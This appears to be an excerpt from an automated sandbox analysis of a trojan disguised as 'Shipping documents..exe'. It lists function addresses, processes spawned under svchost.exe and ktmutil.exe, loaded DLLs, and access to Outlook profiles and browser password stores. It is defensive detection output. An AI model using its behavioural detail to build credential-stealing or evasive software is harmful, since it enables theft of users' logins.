                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F16CC2_2_037F16CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F75712_2_037F7571
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038095C32_2_038095C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DD5B02_2_037DD5B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037314602_2_03731460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FF43F2_2_037FF43F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FFB762_2_037FFB76
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B5BF02_2_037B5BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0377DBF92_2_0377DBF9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375FB802_2_0375FB80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B3A6C2_2_037B3A6C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FFA492_2_037FFA49
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F7A462_2_037F7A46
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EDAC62_2_037EDAC6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DDAAC2_2_037DDAAC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03785AA02_2_03785AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E1AA32_2_037E1AA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037499502_2_03749950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375B9502_2_0375B950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D59102_2_037D5910
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AD8002_2_037AD800
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037438E02_2_037438E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FFF092_2_037FFF09
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03703FD22_2_03703FD2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03703FD52_2_03703FD5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FFFB12_2_037FFFB1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03741F922_2_03741F92
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03749EB02_2_03749EB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F7D732_2_037F7D73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F1D5A2_2_037F1D5A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03743D402_2_03743D40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375FDC02_2_0375FDC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B9C322_2_037B9C32
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FFCF22_2_037FFCF2
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exeCode function: 4_2_0530C9114_2_0530C911
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exeCode function: 4_2_05316DE84_2_05316DE8
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exeCode function: 4_2_0530E6BF4_2_0530E6BF
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exeCode function: 4_2_0530E6C84_2_0530E6C8
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exeCode function: 4_2_0530C9604_2_0530C960
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exeCode function: 4_2_0530C9684_2_0530C968
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exeCode function: 4_2_053150284_2_05315028
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exeCode function: 4_2_0530E8E84_2_0530E8E8
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exeCode function: 4_2_0532D3984_2_0532D398
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_0341A3526_2_0341A352
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_034203E66_2_034203E6
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_0336E3F06_2_0336E3F0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_034002746_2_03400274
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_033E02C06_2_033E02C0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_033FA1186_2_033FA118
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_033501006_2_03350100
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_033E81586_2_033E8158
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_034181CC6_2_034181CC
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_034141A26_2_034141A2
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_034201AA6_2_034201AA
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_033F20006_2_033F2000
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_033607706_2_03360770
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_033847506_2_03384750
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_0335C7C06_2_0335C7C0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_0337C6E06_2_0337C6E0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_033605356_2_03360535
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_034205916_2_03420591
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_034124466_2_03412446
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_034044206_2_03404420
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_0340E4F66_2_0340E4F6
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_0341AB406_2_0341AB40
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_03416BD76_2_03416BD7
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_0335EA806_2_0335EA80
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_033769626_2_03376962
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_033629A06_2_033629A0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_0342A9A66_2_0342A9A6
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_033628406_2_03362840
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_0336A8406_2_0336A840
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_033468B86_2_033468B8
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_0338E8F06_2_0338E8F0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_03380F306_2_03380F30
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_033A2F286_2_033A2F28
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_03402F306_2_03402F30
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_033D4F406_2_033D4F40
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_033DEFA06_2_033DEFA0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_0336CFE06_2_0336CFE0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_03352FC86_2_03352FC8
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_0341EE266_2_0341EE26
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_03360E596_2_03360E59
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_0341EEDB6_2_0341EEDB
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_03372E906_2_03372E90
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_0341CE936_2_0341CE93
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_033FCD1F6_2_033FCD1F
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_0336AD006_2_0336AD00
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_03378DBF6_2_03378DBF
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_0335ADE06_2_0335ADE0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_03360C006_2_03360C00
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_03350CF26_2_03350CF2
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_03400CB56_2_03400CB5
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_0341132D6_2_0341132D
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_0334D34C6_2_0334D34C
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_033A739A6_2_033A739A
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_033652A06_2_033652A0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_034012ED6_2_034012ED
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_0337B2C06_2_0337B2C0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_0342B16B6_2_0342B16B
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_0334F1726_2_0334F172
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_0339516C6_2_0339516C
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_0336B1B06_2_0336B1B0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_0340F0CC6_2_0340F0CC
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_0341F0E06_2_0341F0E0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_034170E96_2_034170E9
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_033670C06_2_033670C0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_0341F7B06_2_0341F7B0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_033A56306_2_033A5630
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_034116CC6_2_034116CC
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_034175716_2_03417571
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_034295C36_2_034295C3
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_033FD5B06_2_033FD5B0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_033514606_2_03351460
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_0341F43F6_2_0341F43F
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_0341FB766_2_0341FB76
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_0337FB806_2_0337FB80
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_0339DBF96_2_0339DBF9
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_033D5BF06_2_033D5BF0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_03417A466_2_03417A46
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_0341FA496_2_0341FA49
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_033D3A6C6_2_033D3A6C
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_0340DAC66_2_0340DAC6
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_033FDAAC6_2_033FDAAC
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_033A5AA06_2_033A5AA0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_03401AA36_2_03401AA3
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_033F59106_2_033F5910
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_033699506_2_03369950
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_0337B9506_2_0337B950
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_033CD8006_2_033CD800
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_033638E06_2_033638E0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_0341FF096_2_0341FF09
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_03361F926_2_03361F92
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_03323FD26_2_03323FD2
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_03323FD56_2_03323FD5
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_0341FFB16_2_0341FFB1
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_03369EB06_2_03369EB0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_03411D5A6_2_03411D5A
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_03417D736_2_03417D73
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_03363D406_2_03363D40
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_0337FDC06_2_0337FDC0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_033D9C326_2_033D9C32
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_0341FCF26_2_0341FCF2
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_02991FB06_2_02991FB0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_0298CEF06_2_0298CEF0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_0298CEE76_2_0298CEE7
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_0298B1906_2_0298B190
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_0298B1886_2_0298B188
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_0298D1106_2_0298D110
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_029956106_2_02995610
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_029ABBC06_2_029ABBC0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_029938506_2_02993850
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_031CE3446_2_031CE344
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_031CE4636_2_031CE463
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_031CCA9B6_2_031CCA9B
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_031CE8056_2_031CE805
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_031CD8C86_2_031CD8C8
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: String function: 033CEA12 appears 86 times
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: String function: 03395130 appears 58 times
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: String function: 033DF290 appears 106 times
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: String function: 0334B970 appears 280 times
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: String function: 033A7E54 appears 111 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03787E54 appears 111 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 037BF290 appears 105 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03775130 appears 58 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0372B970 appears 280 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 037AEA12 appears 86 times
                Source: C:\Users\user\Desktop\Shipping documents..exeCode function: String function: 004115D7 appears 36 times
                Source: C:\Users\user\Desktop\Shipping documents..exeCode function: String function: 00416C70 appears 39 times
                Source: C:\Users\user\Desktop\Shipping documents..exeCode function: String function: 00445AE0 appears 65 times
                Source: Shipping documents..exe, 00000000.00000003.2120440183.00000000048CD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Shipping documents..exe
                Source: Shipping documents..exe, 00000000.00000003.2119035605.0000000004723000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Shipping documents..exe
                Source: Shipping documents..exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@9/2@15/12
                Source: C:\Users\user\Desktop\Shipping documents..exeCode function: 0_2_0044AF6C GetLastError,FormatMessageW,0_2_0044AF6C
                Source: C:\Users\user\Desktop\Shipping documents..exeCode function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004333BE
                Source: C:\Users\user\Desktop\Shipping documents..exeCode function: 0_2_00464EAE OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,0_2_00464EAE
                Source: C:\Users\user\Desktop\Shipping documents..exeCode function: 0_2_0045D619 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode,0_2_0045D619
                Source: C:\Users\user\Desktop\Shipping documents..exeCode function: 0_2_004755C4 CreateToolhelp32Snapshot,Process32FirstW,__wsplitpath,_wcscat,__wcsicoll,Process32NextW,CloseHandle,0_2_004755C4
                Source: C:\Users\user\Desktop\Shipping documents..exeCode function: 0_2_0047839D CoInitialize,CoCreateInstance,CoUninitialize,0_2_0047839D
                Source: C:\Users\user\Desktop\Shipping documents..exeCode function: 0_2_0043305F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,0_2_0043305F
                Source: C:\Users\user\Desktop\Shipping documents..exeFile created: C:\Users\user\AppData\Local\Temp\bothsidednessJump to behavior
                Source: C:\Users\user\Desktop\Shipping documents..exeCommand line argument: #v0_2_0040D6B0
                Source: Shipping documents..exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\Shipping documents..exeFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\Shipping documents..exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: ktmutil.exe, 00000006.00000002.4559793375.0000000002E71000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000006.00000003.2630854960.0000000002E22000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000006.00000003.2631010094.0000000002E43000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000006.00000002.4559793375.0000000002E43000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000006.00000002.4559793375.0000000002E4C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: Shipping documents..exeReversingLabs: Detection: 42%
                Source: C:\Users\user\Desktop\Shipping documents..exeFile read: C:\Users\user\Desktop\Shipping documents..exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\Shipping documents..exe "C:\Users\user\Desktop\Shipping documents..exe"
                Source: C:\Users\user\Desktop\Shipping documents..exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Shipping documents..exe"
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exeProcess created: C:\Windows\SysWOW64\srdelayed.exe "C:\Windows\SysWOW64\srdelayed.exe"
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exeProcess created: C:\Windows\SysWOW64\ktmutil.exe "C:\Windows\SysWOW64\ktmutil.exe"
                Source: C:\Windows\SysWOW64\ktmutil.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\Shipping documents..exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Shipping documents..exe"Jump to behavior
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exeProcess created: C:\Windows\SysWOW64\srdelayed.exe "C:\Windows\SysWOW64\srdelayed.exe"Jump to behavior
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exeProcess created: C:\Windows\SysWOW64\ktmutil.exe "C:\Windows\SysWOW64\ktmutil.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Shipping documents..exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\Shipping documents..exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\Shipping documents..exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\Shipping documents..exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\Shipping documents..exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\Shipping documents..exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\Shipping documents..exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\Shipping documents..exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\Shipping documents..exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\Shipping documents..exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\Shipping documents..exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: ktmw32.dllJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\Shipping documents..exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: Shipping documents..exeStatic file information: File size 1322107 > 1048576
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: FuFneNIzDsF.exe, 00000004.00000002.4559487578.00000000003CE000.00000002.00000001.01000000.00000005.sdmp, FuFneNIzDsF.exe, 00000008.00000000.2507028325.00000000003CE000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: Shipping documents..exe, 00000000.00000003.2122204716.0000000004600000.00000004.00001000.00020000.00000000.sdmp, Shipping documents..exe, 00000000.00000003.2116752681.00000000047A0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2433300541.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2339806814.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2433300541.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337559785.0000000003300000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000006.00000002.4569169895.00000000034BE000.00000040.00001000.00020000.00000000.sdmp, ktmutil.exe, 00000006.00000002.4569169895.0000000003320000.00000040.00001000.00020000.00000000.sdmp, ktmutil.exe, 00000006.00000003.2443745959.0000000003178000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000006.00000003.2441691233.0000000002FCC000.00000004.00000020.00020000.00000000.sdmp
